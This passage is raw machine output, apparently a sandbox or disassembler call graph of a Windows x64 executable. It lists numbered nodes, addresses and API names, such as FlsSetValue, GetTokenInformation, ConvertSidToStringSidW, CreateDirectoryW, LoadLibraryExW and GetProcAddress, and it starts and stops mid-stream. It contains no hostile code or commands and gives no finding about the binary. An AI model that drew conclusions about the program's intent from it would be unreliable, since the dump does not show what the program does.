45 API calls 16561->16562 16563 7ff76d5dd5a2 memcpy_s 16561->16563 16562->16563 16563->16484 16563->16563 16565 7ff76d5dd23b 16564->16565 16569 7ff76d5dd288 memcpy_s 16564->16569 16566 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16565->16566 16567 7ff76d5dd267 16566->16567 16567->16484 16568 7ff76d5dd2f3 16570 7ff76d5d97b4 __std_exception_copy 37 API calls 16568->16570 16569->16568 16571 7ff76d5d3ae0 45 API calls 16569->16571 16574 7ff76d5dd335 memcpy_s 16570->16574 16571->16568 16572 7ff76d5d9c10 _isindst 17 API calls 16573 7ff76d5dd3e0 16572->16573 16574->16572 16576 7ff76d5cff6e 16575->16576 16577 7ff76d5cff7f 16575->16577 16576->16399 16577->16576 16578 7ff76d5dc90c _fread_nolock 12 API calls 16577->16578 16579 7ff76d5cffb0 16578->16579 16580 7ff76d5cffc4 16579->16580 16581 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16579->16581 16582 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16580->16582 16581->16580 16582->16576 16584 7ff76d5d3a86 16583->16584 16585 7ff76d5d3a8e 16583->16585 16586 7ff76d5d3ae0 45 API calls 16584->16586 16585->16410 16586->16585 16588 7ff76d5dcce1 16587->16588 16589 7ff76d5d3b1f 16587->16589 16588->16589 16595 7ff76d5e2614 16588->16595 16591 7ff76d5dcd34 16589->16591 16592 7ff76d5dcd4d 16591->16592 16594 7ff76d5d3b2f 16591->16594 16592->16594 16630 7ff76d5e1960 16592->16630 16594->16332 16607 7ff76d5da460 GetLastError 16595->16607 16598 7ff76d5e266e 16598->16589 16608 7ff76d5da484 FlsGetValue 16607->16608 16609 7ff76d5da4a1 FlsSetValue 16607->16609 16610 7ff76d5da49b 16608->16610 16626 7ff76d5da491 16608->16626 16611 7ff76d5da4b3 16609->16611 16609->16626 16610->16609 16613 7ff76d5ddea8 memcpy_s 11 API calls 16611->16613 16612 7ff76d5da50d SetLastError 16614 7ff76d5da52d 16612->16614 16615 7ff76d5da51a 16612->16615 16616 7ff76d5da4c2 16613->16616 16617 7ff76d5d9814 __CxxCallCatchBlock 38 API calls 16614->16617 16615->16598 16629 7ff76d5df5e8 EnterCriticalSection 16615->16629 16618 7ff76d5da4e0 FlsSetValue 16616->16618 16619 7ff76d5da4d0 FlsSetValue 16616->16619 16622 7ff76d5da532 16617->16622 16620 7ff76d5da4ec FlsSetValue 16618->16620 16621 7ff76d5da4fe 16618->16621 16623 7ff76d5da4d9 16619->16623 16620->16623 16625 7ff76d5da204 memcpy_s 11 API calls 16621->16625 16624 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16623->16624 16624->16626 16627 7ff76d5da506 16625->16627 16626->16612 16628 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16627->16628 16628->16612 16631 7ff76d5da460 __CxxCallCatchBlock 45 API calls 16630->16631 16632 7ff76d5e1969 16631->16632 16639 7ff76d5e6098 16633->16639 16638 7ff76d5debb9 MultiByteToWideChar 16636->16638 16642 7ff76d5e60fc 16639->16642 16640 7ff76d5cb870 _log10_special 8 API calls 16641 7ff76d5df3cd 16640->16641 16641->16434 16642->16640 16644 7ff76d5d032f 16643->16644 16645 7ff76d5d031d 16643->16645 16648 7ff76d5d033d 16644->16648 16651 7ff76d5d0379 16644->16651 16646 7ff76d5d43f4 memcpy_s 11 API calls 16645->16646 16647 7ff76d5d0322 16646->16647 16649 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16647->16649 16650 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16648->16650 16657 7ff76d5d032d 16649->16657 16650->16657 16652 7ff76d5d06f5 16651->16652 16654 7ff76d5d43f4 memcpy_s 11 API calls 16651->16654 16653 7ff76d5d43f4 memcpy_s 11 API calls 16652->16653 16652->16657 16655 7ff76d5d0989 16653->16655 16656 7ff76d5d06ea 16654->16656 16658 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16655->16658 16659 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16656->16659 16657->16296 16658->16657 16659->16652 16661 7ff76d5cfa24 16660->16661 16690 7ff76d5cf784 16661->16690 16663 7ff76d5cfa3d 16663->15915 16702 7ff76d5cf6dc 16664->16702 16668 7ff76d5c277c 16667->16668 16669 7ff76d5d43f4 memcpy_s 11 API calls 16668->16669 16670 7ff76d5c2799 16669->16670 16716 7ff76d5d3ca4 16670->16716 16675 7ff76d5c1bf0 49 API calls 16676 7ff76d5c2807 16675->16676 16677 7ff76d5c86b0 2 API calls 16676->16677 16678 7ff76d5c281f 16677->16678 16679 7ff76d5c2843 MessageBoxA 16678->16679 16680 7ff76d5c282c MessageBoxW 16678->16680 16681 7ff76d5c2855 16679->16681 16680->16681 16682 7ff76d5cb870 _log10_special 8 API calls 16681->16682 16683 7ff76d5c2865 16682->16683 16683->15944 16685 7ff76d5c1b06 16684->16685 16686 7ff76d5cf439 16684->16686 16685->15943 16685->15944 16687 7ff76d5d43f4 memcpy_s 11 API calls 16686->16687 16688 7ff76d5cf43e 16687->16688 16689 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16688->16689 16689->16685 16691 7ff76d5cf7ee 16690->16691 16692 7ff76d5cf7ae 16690->16692 16691->16692 16694 7ff76d5cf7fa 16691->16694 16693 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16692->16693 16695 7ff76d5cf7d5 16693->16695 16701 7ff76d5d477c EnterCriticalSection 16694->16701 16695->16663 16703 7ff76d5c19b9 16702->16703 16704 7ff76d5cf706 16702->16704 16703->15921 16703->15922 16704->16703 16705 7ff76d5cf715 memcpy_s 16704->16705 16706 7ff76d5cf752 16704->16706 16708 7ff76d5d43f4 memcpy_s 11 API calls 16705->16708 16715 7ff76d5d477c EnterCriticalSection 16706->16715 16710 7ff76d5cf72a 16708->16710 16712 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16710->16712 16712->16703 16720 7ff76d5d3cfe 16716->16720 16717 7ff76d5d3d23 16718 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16717->16718 16722 7ff76d5d3d4d 16718->16722 16719 7ff76d5d3d5f 16746 7ff76d5d1f30 16719->16746 16720->16717 16720->16719 16724 7ff76d5cb870 _log10_special 8 API calls 16722->16724 16723 7ff76d5d3e08 16731 7ff76d5d3e3c 16723->16731 16733 7ff76d5d3e11 16723->16733 16727 7ff76d5c27d8 16724->16727 16725 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16725->16722 16734 7ff76d5d4480 16727->16734 16728 7ff76d5d3e60 16729 7ff76d5d3e6a 16728->16729 16728->16731 16732 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16729->16732 16730 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16730->16722 16731->16725 16732->16722 16733->16730 16735 7ff76d5da5d8 memcpy_s 11 API calls 16734->16735 16736 7ff76d5d4497 16735->16736 16737 7ff76d5ddea8 memcpy_s 11 API calls 16736->16737 16740 7ff76d5d44d7 16736->16740 16742 7ff76d5c27df 16736->16742 16738 7ff76d5d44cc 16737->16738 16739 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16738->16739 16739->16740 16740->16742 16884 7ff76d5ddf30 16740->16884 16742->16675 16744 7ff76d5d9c10 _isindst 17 API calls 16745 7ff76d5d451c 16744->16745 16747 7ff76d5d1f6e 16746->16747 16748 7ff76d5d1f5e 16746->16748 16749 7ff76d5d1f77 16747->16749 16756 7ff76d5d1fa5 16747->16756 16752 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16748->16752 16750 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16749->16750 16751 7ff76d5d1f9d 16750->16751 16751->16723 16751->16728 16751->16731 16751->16733 16752->16751 16753 7ff76d5d3ae0 45 API calls 16753->16756 16755 7ff76d5d2254 16758 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16755->16758 16756->16748 16756->16751 16756->16753 16756->16755 16760 7ff76d5d28c0 16756->16760 16786 7ff76d5d2588 16756->16786 16816 7ff76d5d1e10 16756->16816 16758->16748 16761 7ff76d5d2975 16760->16761 16762 7ff76d5d2902 16760->16762 16763 7ff76d5d29cf 16761->16763 16764 7ff76d5d297a 16761->16764 16765 7ff76d5d299f 16762->16765 16766 7ff76d5d2908 16762->16766 16763->16765 16775 7ff76d5d29de 16763->16775 16783 7ff76d5d2938 16763->16783 16767 7ff76d5d29af 16764->16767 16768 7ff76d5d297c 16764->16768 16833 7ff76d5d0e70 16765->16833 16773 7ff76d5d290d 16766->16773 16766->16775 16840 7ff76d5d0a60 16767->16840 16769 7ff76d5d291d 16768->16769 16774 7ff76d5d298b 16768->16774 16785 7ff76d5d2a0d 16769->16785 16819 7ff76d5d3224 16769->16819 16773->16769 16776 7ff76d5d2950 16773->16776 16773->16783 16774->16765 16778 7ff76d5d2990 16774->16778 16775->16785 16847 7ff76d5d1280 16775->16847 16776->16785 16829 7ff76d5d36e0 16776->16829 16781 7ff76d5d3878 37 API calls 16778->16781 16778->16785 16780 7ff76d5cb870 _log10_special 8 API calls 16782 7ff76d5d2ca3 16780->16782 16781->16783 16782->16756 16783->16785 16854 7ff76d5ddb68 16783->16854 16785->16780 16787 7ff76d5d2593 16786->16787 16788 7ff76d5d25a9 16786->16788 16790 7ff76d5d25e7 16787->16790 16791 7ff76d5d2975 16787->16791 16792 7ff76d5d2902 16787->16792 16789 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16788->16789 16788->16790 16789->16790 16790->16756 16793 7ff76d5d29cf 16791->16793 16794 7ff76d5d297a 16791->16794 16795 7ff76d5d299f 16792->16795 16796 7ff76d5d2908 16792->16796 16793->16795 16806 7ff76d5d29de 16793->16806 16813 7ff76d5d2938 16793->16813 16797 7ff76d5d29af 16794->16797 16798 7ff76d5d297c 16794->16798 16800 7ff76d5d0e70 38 API calls 16795->16800 16803 7ff76d5d290d 16796->16803 16796->16806 16801 7ff76d5d0a60 38 API calls 16797->16801 16799 7ff76d5d291d 16798->16799 16804 7ff76d5d298b 16798->16804 16802 7ff76d5d3224 47 API calls 16799->16802 16815 7ff76d5d2a0d 16799->16815 16800->16813 16801->16813 16802->16813 16803->16799 16805 7ff76d5d2950 16803->16805 16803->16813 16804->16795 16808 7ff76d5d2990 16804->16808 16809 7ff76d5d36e0 47 API calls 16805->16809 16805->16815 16807 7ff76d5d1280 38 API calls 16806->16807 16806->16815 16807->16813 16811 7ff76d5d3878 37 API calls 16808->16811 16808->16815 16809->16813 16810 7ff76d5cb870 _log10_special 8 API calls 16812 7ff76d5d2ca3 16810->16812 16811->16813 16812->16756 16814 7ff76d5ddb68 47 API calls 16813->16814 16813->16815 16814->16813 16815->16810 16867 7ff76d5d0034 16816->16867 16820 7ff76d5d3246 16819->16820 16821 7ff76d5cfea0 12 API calls 16820->16821 16822 7ff76d5d328e 16821->16822 16823 7ff76d5dd880 46 API calls 16822->16823 16824 7ff76d5d3361 16823->16824 16825 7ff76d5d3ae0 45 API calls 16824->16825 16826 7ff76d5d3383 16824->16826 16825->16826 16827 7ff76d5d3ae0 45 API calls 16826->16827 16828 7ff76d5d340c 16826->16828 16827->16828 16828->16783 16830 7ff76d5d36f8 16829->16830 16832 7ff76d5d3760 16829->16832 16831 7ff76d5ddb68 47 API calls 16830->16831 16830->16832 16831->16832 16832->16783 16834 7ff76d5d0ea3 16833->16834 16835 7ff76d5d0ed2 16834->16835 16837 7ff76d5d0f8f 16834->16837 16836 7ff76d5cfea0 12 API calls 16835->16836 16839 7ff76d5d0f0f 16835->16839 16836->16839 16838 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16837->16838 16838->16839 16839->16783 16841 7ff76d5d0a93 16840->16841 16842 7ff76d5d0ac2 16841->16842 16844 7ff76d5d0b7f 16841->16844 16843 7ff76d5cfea0 12 API calls 16842->16843 16846 7ff76d5d0aff 16842->16846 16843->16846 16845 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16844->16845 16845->16846 16846->16783 16848 7ff76d5d12b3 16847->16848 16849 7ff76d5d12e2 16848->16849 16851 7ff76d5d139f 16848->16851 16850 7ff76d5cfea0 12 API calls 16849->16850 16853 7ff76d5d131f 16849->16853 16850->16853 16852 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16851->16852 16852->16853 16853->16783 16855 7ff76d5ddb90 16854->16855 16856 7ff76d5ddbd5 16855->16856 16857 7ff76d5d3ae0 45 API calls 16855->16857 16861 7ff76d5ddb95 memcpy_s 16855->16861 16863 7ff76d5ddbbe memcpy_s 16855->16863 16856->16861 16856->16863 16864 7ff76d5dfaf8 16856->16864 16857->16856 16858 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16858->16861 16861->16783 16863->16858 16863->16861 16865 7ff76d5dfb1c WideCharToMultiByte 16864->16865 16868 7ff76d5d0073 16867->16868 16869 7ff76d5d0061 16867->16869 16872 7ff76d5d0080 16868->16872 16875 7ff76d5d00bd 16868->16875 16870 7ff76d5d43f4 memcpy_s 11 API calls 16869->16870 16871 7ff76d5d0066 16870->16871 16874 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16871->16874 16873 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16872->16873 16882 7ff76d5d0071 16873->16882 16874->16882 16876 7ff76d5d0166 16875->16876 16877 7ff76d5d43f4 memcpy_s 11 API calls 16875->16877 16878 7ff76d5d43f4 memcpy_s 11 API calls 16876->16878 16876->16882 16879 7ff76d5d015b 16877->16879 16880 7ff76d5d0210 16878->16880 16881 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16879->16881 16883 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16880->16883 16881->16876 16882->16756 16883->16882 16887 7ff76d5ddf4d 16884->16887 16885 7ff76d5ddf52 16886 7ff76d5d43f4 memcpy_s 11 API calls 16885->16886 16889 7ff76d5d44fd 16885->16889 16892 7ff76d5ddf5c 16886->16892 16887->16885 16887->16889 16890 7ff76d5ddf9c 16887->16890 16888 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16888->16889 16889->16742 16889->16744 16890->16889 16891 7ff76d5d43f4 memcpy_s 11 API calls 16890->16891 16891->16892 16892->16888 16894 7ff76d5d7555 16893->16894 16895 7ff76d5d7568 16893->16895 16896 7ff76d5d43f4 memcpy_s 11 API calls 16894->16896 16903 7ff76d5d71cc 16895->16903 16898 7ff76d5d755a 16896->16898 16899 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16898->16899 16901 7ff76d5d7566 16899->16901 16901->15962 16910 7ff76d5df5e8 EnterCriticalSection 16903->16910 16912 7ff76d5c7b91 GetTokenInformation 16911->16912 16913 7ff76d5c7c13 __vcrt_freefls 16911->16913 16914 7ff76d5c7bb2 GetLastError 16912->16914 16917 7ff76d5c7bbd 16912->16917 16915 7ff76d5c7c26 CloseHandle 16913->16915 16916 7ff76d5c7c2c 16913->16916 16914->16913 16914->16917 16915->16916 16916->15971 16917->16913 16918 7ff76d5c7bd9 GetTokenInformation 16917->16918 16918->16913 16919 7ff76d5c7bfc 16918->16919 16919->16913 16920 7ff76d5c7c06 ConvertSidToStringSidW 16919->16920 16920->16913 16922 7ff76d5c297a 16921->16922 17206 7ff76d5c3f70 108 API calls 17205->17206 17207 7ff76d5c1463 17206->17207 17208 7ff76d5c148c 17207->17208 17209 7ff76d5c146b 17207->17209 17211 7ff76d5cf9f4 73 API calls 17208->17211 17210 7ff76d5c25f0 53 API calls 17209->17210 17212 7ff76d5c147b 17210->17212 17213 7ff76d5c14a1 17211->17213 17212->16031 17214 7ff76d5c14c1 17213->17214 17215 7ff76d5c14a5 17213->17215 17217 7ff76d5c14f1 17214->17217 17218 7ff76d5c14d1 17214->17218 17216 7ff76d5c2760 53 API calls 17215->17216 17226 7ff76d5c14bc __vcrt_freefls 17216->17226 17220 7ff76d5c14f7 17217->17220 17224 7ff76d5c150a 17217->17224 17219 7ff76d5c2760 53 API calls 17218->17219 17219->17226 17229 7ff76d5c11f0 17220->17229 17221 7ff76d5cf36c 74 API calls 17223 7ff76d5c1584 17221->17223 17223->16031 17225 7ff76d5cf6bc _fread_nolock 53 API calls 17224->17225 17224->17226 17227 7ff76d5c1596 17224->17227 17225->17224 17226->17221 17228 7ff76d5c2760 53 API calls 17227->17228 17228->17226 17230 7ff76d5c1248 17229->17230 17231 7ff76d5c124f 17230->17231 17232 7ff76d5c1277 17230->17232 17233 7ff76d5c25f0 53 API calls 17231->17233 17235 7ff76d5c1291 17232->17235 17236 7ff76d5c12ad 17232->17236 17234 7ff76d5c1262 17233->17234 17234->17226 17237 7ff76d5c2760 53 API calls 17235->17237 17238 7ff76d5c12bf 17236->17238 17245 7ff76d5c12db memcpy_s 17236->17245 17241 7ff76d5c12a8 __vcrt_freefls 17237->17241 17239 7ff76d5c2760 53 API calls 17238->17239 17239->17241 17240 7ff76d5cf6bc _fread_nolock 53 API calls 17240->17245 17241->17226 17245->17240 17245->17241 17267 7ff76d5c3f1a 17266->17267 17268 7ff76d5c86b0 2 API calls 17267->17268 17269 7ff76d5c3f3f 17268->17269 17270 7ff76d5cb870 _log10_special 8 API calls 17269->17270 17271 7ff76d5c3f67 17270->17271 17271->16044 17274 7ff76d5c753e 17272->17274 17273 7ff76d5c7662 17277 7ff76d5cb870 _log10_special 8 API calls 17273->17277 17274->17273 17275 7ff76d5c1bf0 49 API calls 17274->17275 17276 7ff76d5c75c5 17275->17276 17276->17273 17279 7ff76d5c1bf0 49 API calls 17276->17279 17280 7ff76d5c3f10 10 API calls 17276->17280 17281 7ff76d5c761b 17276->17281 17278 7ff76d5c7693 17277->17278 17278->16044 17279->17276 17280->17276 17282 7ff76d5c86b0 2 API calls 17281->17282 17283 7ff76d5c7633 CreateDirectoryW 17282->17283 17283->17273 17283->17276 17285 7ff76d5c15d3 17284->17285 17286 7ff76d5c15f7 17284->17286 17373 7ff76d5c1050 17285->17373 17288 7ff76d5c3f70 108 API calls 17286->17288 17289 7ff76d5c160b 17288->17289 17292 7ff76d5c1613 17289->17292 17293 7ff76d5c163b 17289->17293 17290 7ff76d5c15ee 17290->16044 17291 7ff76d5c15d8 17291->17290 17295 7ff76d5c25f0 53 API calls 17291->17295 17296 7ff76d5c2760 53 API calls 17292->17296 17294 7ff76d5c3f70 108 API calls 17293->17294 17298 7ff76d5c164f 17294->17298 17295->17290 17297 7ff76d5c162a 17296->17297 17297->16044 17299 7ff76d5c1671 17298->17299 17300 7ff76d5c1657 17298->17300 17302 7ff76d5cf9f4 73 API calls 17299->17302 17301 7ff76d5c25f0 53 API calls 17300->17301 17303 7ff76d5c1667 17301->17303 17304 7ff76d5c1686 17302->17304 17323 7ff76d5c6904 17322->17323 17324 7ff76d5c694b 17322->17324 17323->17324 17412 7ff76d5d4250 17323->17412 17324->16044 17327 7ff76d5c3b51 17326->17327 17328 7ff76d5c3e90 49 API calls 17327->17328 17329 7ff76d5c3b8b 17328->17329 17330 7ff76d5c3e90 49 API calls 17329->17330 17331 7ff76d5c3b9b 17330->17331 17332 7ff76d5c3bbd 17331->17332 17333 7ff76d5c3bec 17331->17333 17443 7ff76d5c3ac0 17332->17443 17335 7ff76d5c3ac0 51 API calls 17333->17335 17336 7ff76d5c3bea 17335->17336 17371 7ff76d5c1bf0 49 API calls 17370->17371 17372 7ff76d5c3e24 17371->17372 17372->16044 17374 7ff76d5c3f70 108 API calls 17373->17374 17375 7ff76d5c108b 17374->17375 17376 7ff76d5c1093 17375->17376 17377 7ff76d5c10a8 17375->17377 17379 7ff76d5c25f0 53 API calls 17376->17379 17378 7ff76d5cf9f4 73 API calls 17377->17378 17380 7ff76d5c10bd 17378->17380 17384 7ff76d5c10a3 __vcrt_freefls 17379->17384 17381 7ff76d5c10c1 17380->17381 17382 7ff76d5c10dd 17380->17382 17384->17291 17413 7ff76d5d425d 17412->17413 17414 7ff76d5d428a 17412->17414 17415 7ff76d5d43f4 memcpy_s 11 API calls 17413->17415 17422 7ff76d5d4214 17413->17422 17416 7ff76d5d42ad 17414->17416 17417 7ff76d5d42c9 17414->17417 17418 7ff76d5d4267 17415->17418 17419 7ff76d5d43f4 memcpy_s 11 API calls 17416->17419 17427 7ff76d5d4178 17417->17427 17421 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 17418->17421 17423 7ff76d5d42b2 17419->17423 17425 7ff76d5d4272 17421->17425 17422->17323 17424 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 17423->17424 17426 7ff76d5d42bd 17424->17426 17425->17323 17426->17323 17428 7ff76d5d419c 17427->17428 17429 7ff76d5d4197 17427->17429 17428->17429 17430 7ff76d5da460 __CxxCallCatchBlock 45 API calls 17428->17430 17429->17426 17431 7ff76d5d41b7 17430->17431 17435 7ff76d5dcc94 17431->17435 17444 7ff76d5c3ae6 17443->17444 17507 7ff76d5cbe12 RtlLookupFunctionEntry 17506->17507 17508 7ff76d5cbc2b 17507->17508 17509 7ff76d5cbe28 RtlVirtualUnwind 17507->17509 17510 7ff76d5cbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17508->17510 17509->17507 17509->17508 17512 7ff76d5d51d8 17511->17512 17513 7ff76d5d51fe 17512->17513 17515 7ff76d5d5231 17512->17515 17514 7ff76d5d43f4 memcpy_s 11 API calls 17513->17514 17516 7ff76d5d5203 17514->17516 17517 7ff76d5d5244 17515->17517 17518 7ff76d5d5237 17515->17518 17519 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 17516->17519 17530 7ff76d5d9f38 17517->17530 17521 7ff76d5d43f4 memcpy_s 11 API calls 17518->17521 17520 7ff76d5c3fc6 17519->17520 17520->16091 17521->17520 17543 7ff76d5df5e8 EnterCriticalSection 17530->17543 17903 7ff76d5d6c08 17902->17903 17906 7ff76d5d66e4 17903->17906 17905 7ff76d5d6c21 17905->16101 17907 7ff76d5d66ff 17906->17907 17908 7ff76d5d672e 17906->17908 17909 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 17907->17909 17916 7ff76d5d477c EnterCriticalSection 17908->17916 17911 7ff76d5d671f 17909->17911 17911->17905 17918 7ff76d5cf163 17917->17918 17920 7ff76d5cf191 17917->17920 17919 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 17918->17919 17921 7ff76d5cf183 17919->17921 17920->17921 17927 7ff76d5d477c EnterCriticalSection 17920->17927 17921->16105 17929 7ff76d5c86b0 2 API calls 17928->17929 17930 7ff76d5c81b4 LoadLibraryExW 17929->17930 17931 7ff76d5c81d3 __vcrt_freefls 17930->17931 17931->16135 17933 7ff76d5c6ef3 GetProcAddress 17932->17933 17934 7ff76d5c6ec9 17932->17934 17933->17934 17935 7ff76d5c6f18 GetProcAddress 17933->17935 17936 7ff76d5c29e0 51 API calls 17934->17936 17935->17934 17937 7ff76d5c6f3d GetProcAddress 17935->17937 17938 7ff76d5c6ee3 17936->17938 17937->17934 17938->16142 17998 7ff76d5c5b05 17997->17998 17999 7ff76d5c1bf0 49 API calls 17998->17999 18000 7ff76d5c5b41 17999->18000 18001 7ff76d5c5b4a 18000->18001 18002 7ff76d5c5b6d 18000->18002 18003 7ff76d5c25f0 53 API calls 18001->18003 18004 7ff76d5c3fe0 49 API calls 18002->18004 18020 7ff76d5c5b63 18003->18020 18005 7ff76d5c5b85 18004->18005 18006 7ff76d5c5ba3 18005->18006 18009 7ff76d5c25f0 53 API calls 18005->18009 18007 7ff76d5c3f10 10 API calls 18006->18007 18011 7ff76d5c5bad 18007->18011 18008 7ff76d5cb870 _log10_special 8 API calls 18010 7ff76d5c308e 18008->18010 18009->18006 18010->16175 18028 7ff76d5c5c80 18010->18028 18012 7ff76d5c5bbb 18011->18012 18013 7ff76d5c81a0 3 API calls 18011->18013 18014 7ff76d5c3fe0 49 API calls 18012->18014 18013->18012 18015 7ff76d5c5bd4 18014->18015 18016 7ff76d5c5bf9 18015->18016 18017 7ff76d5c5bd9 18015->18017 18019 7ff76d5c81a0 3 API calls 18016->18019 18018 7ff76d5c25f0 53 API calls 18017->18018 18018->18020 18021 7ff76d5c5c06 18019->18021 18020->18008 18167 7ff76d5c4c80 18028->18167 18030 7ff76d5c5cba 18031 7ff76d5c5cc2 18030->18031 18032 7ff76d5c5cd3 18030->18032 18033 7ff76d5c25f0 53 API calls 18031->18033 18174 7ff76d5c4450 18032->18174 18169 7ff76d5c4cac 18167->18169 18168 7ff76d5c4cb4 18168->18030 18169->18168 18172 7ff76d5c4e54 18169->18172 18205 7ff76d5d5db4 18169->18205 18170 7ff76d5c5017 __vcrt_freefls 18170->18030 18171 7ff76d5c4180 47 API calls 18171->18172 18172->18170 18172->18171 18206 7ff76d5d5de4 18205->18206 18209 7ff76d5d52b0 18206->18209 18210 7ff76d5d52f3 18209->18210 18211 7ff76d5d52e1 18209->18211 18285->16178 18287 7ff76d5da460 __CxxCallCatchBlock 45 API calls 18286->18287 18288 7ff76d5d96f1 18287->18288 18291 7ff76d5d9814 18288->18291 18300 7ff76d5e2960 18291->18300 18326 7ff76d5e2918 18300->18326 18331 7ff76d5df5e8 EnterCriticalSection 18326->18331 18335 7ff76d5dfbd8 18336 7ff76d5dfbfc 18335->18336 18338 7ff76d5dfc0c 18335->18338 18337 7ff76d5d43f4 memcpy_s 11 API calls 18336->18337 18360 7ff76d5dfc01 18337->18360 18339 7ff76d5dfeec 18338->18339 18340 7ff76d5dfc2e 18338->18340 18341 7ff76d5d43f4 memcpy_s 11 API calls 18339->18341 18342 7ff76d5dfc4f 18340->18342 18466 7ff76d5e0294 18340->18466 18343 7ff76d5dfef1 18341->18343 18346 7ff76d5dfcc1 18342->18346 18347 7ff76d5dfc75 18342->18347 18352 7ff76d5dfcb5 18342->18352 18345 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18343->18345 18345->18360 18349 7ff76d5ddea8 memcpy_s 11 API calls 18346->18349 18364 7ff76d5dfc84 18346->18364 18481 7ff76d5d89d8 18347->18481 18348 7ff76d5dfd6e 18359 7ff76d5dfd8b 18348->18359 18365 7ff76d5dfddd 18348->18365 18353 7ff76d5dfcd7 18349->18353 18352->18348 18352->18364 18487 7ff76d5e643c 18352->18487 18356 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18353->18356 18355 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18355->18360 18361 7ff76d5dfce5 18356->18361 18357 7ff76d5dfc7f 18362 7ff76d5d43f4 memcpy_s 11 API calls 18357->18362 18358 7ff76d5dfc9d 18358->18352 18367 7ff76d5e0294 45 API calls 18358->18367 18363 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18359->18363 18361->18352 18361->18364 18369 7ff76d5ddea8 memcpy_s 11 API calls 18361->18369 18362->18364 18366 7ff76d5dfd94 18363->18366 18364->18355 18365->18364 18368 7ff76d5e26ec 40 API calls 18365->18368 18375 7ff76d5dfd99 18366->18375 18523 7ff76d5e26ec 18366->18523 18367->18352 18370 7ff76d5dfe1a 18368->18370 18371 7ff76d5dfd07 18369->18371 18372 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18370->18372 18377 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18371->18377 18378 7ff76d5dfe24 18372->18378 18374 7ff76d5dfee0 18380 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18374->18380 18375->18374 18381 7ff76d5ddea8 memcpy_s 11 API calls 18375->18381 18376 7ff76d5dfdc5 18379 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18376->18379 18377->18352 18378->18364 18378->18375 18379->18375 18380->18360 18382 7ff76d5dfe68 18381->18382 18383 7ff76d5dfe70 18382->18383 18384 7ff76d5dfe79 18382->18384 18385 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18383->18385 18386 7ff76d5d97b4 __std_exception_copy 37 API calls 18384->18386 18387 7ff76d5dfe77 18385->18387 18388 7ff76d5dfe88 18386->18388 18392 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18387->18392 18389 7ff76d5dfe90 18388->18389 18390 7ff76d5dff1b 18388->18390 18532 7ff76d5e6554 18389->18532 18391 7ff76d5d9c10 _isindst 17 API calls 18390->18391 18394 7ff76d5dff2f 18391->18394 18392->18360 18396 7ff76d5dff58 18394->18396 18405 7ff76d5dff68 18394->18405 18399 7ff76d5d43f4 memcpy_s 11 API calls 18396->18399 18397 7ff76d5dfed8 18400 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18397->18400 18398 7ff76d5dfeb7 18401 7ff76d5d43f4 memcpy_s 11 API calls 18398->18401 18403 7ff76d5dff5d 18399->18403 18400->18374 18402 7ff76d5dfebc 18401->18402 18404 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18402->18404 18404->18387 18406 7ff76d5e024b 18405->18406 18407 7ff76d5dff8a 18405->18407 18408 7ff76d5d43f4 memcpy_s 11 API calls 18406->18408 18409 7ff76d5dffa7 18407->18409 18551 7ff76d5e037c 18407->18551 18410 7ff76d5e0250 18408->18410 18413 7ff76d5e001b 18409->18413 18415 7ff76d5dffcf 18409->18415 18419 7ff76d5e000f 18409->18419 18412 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 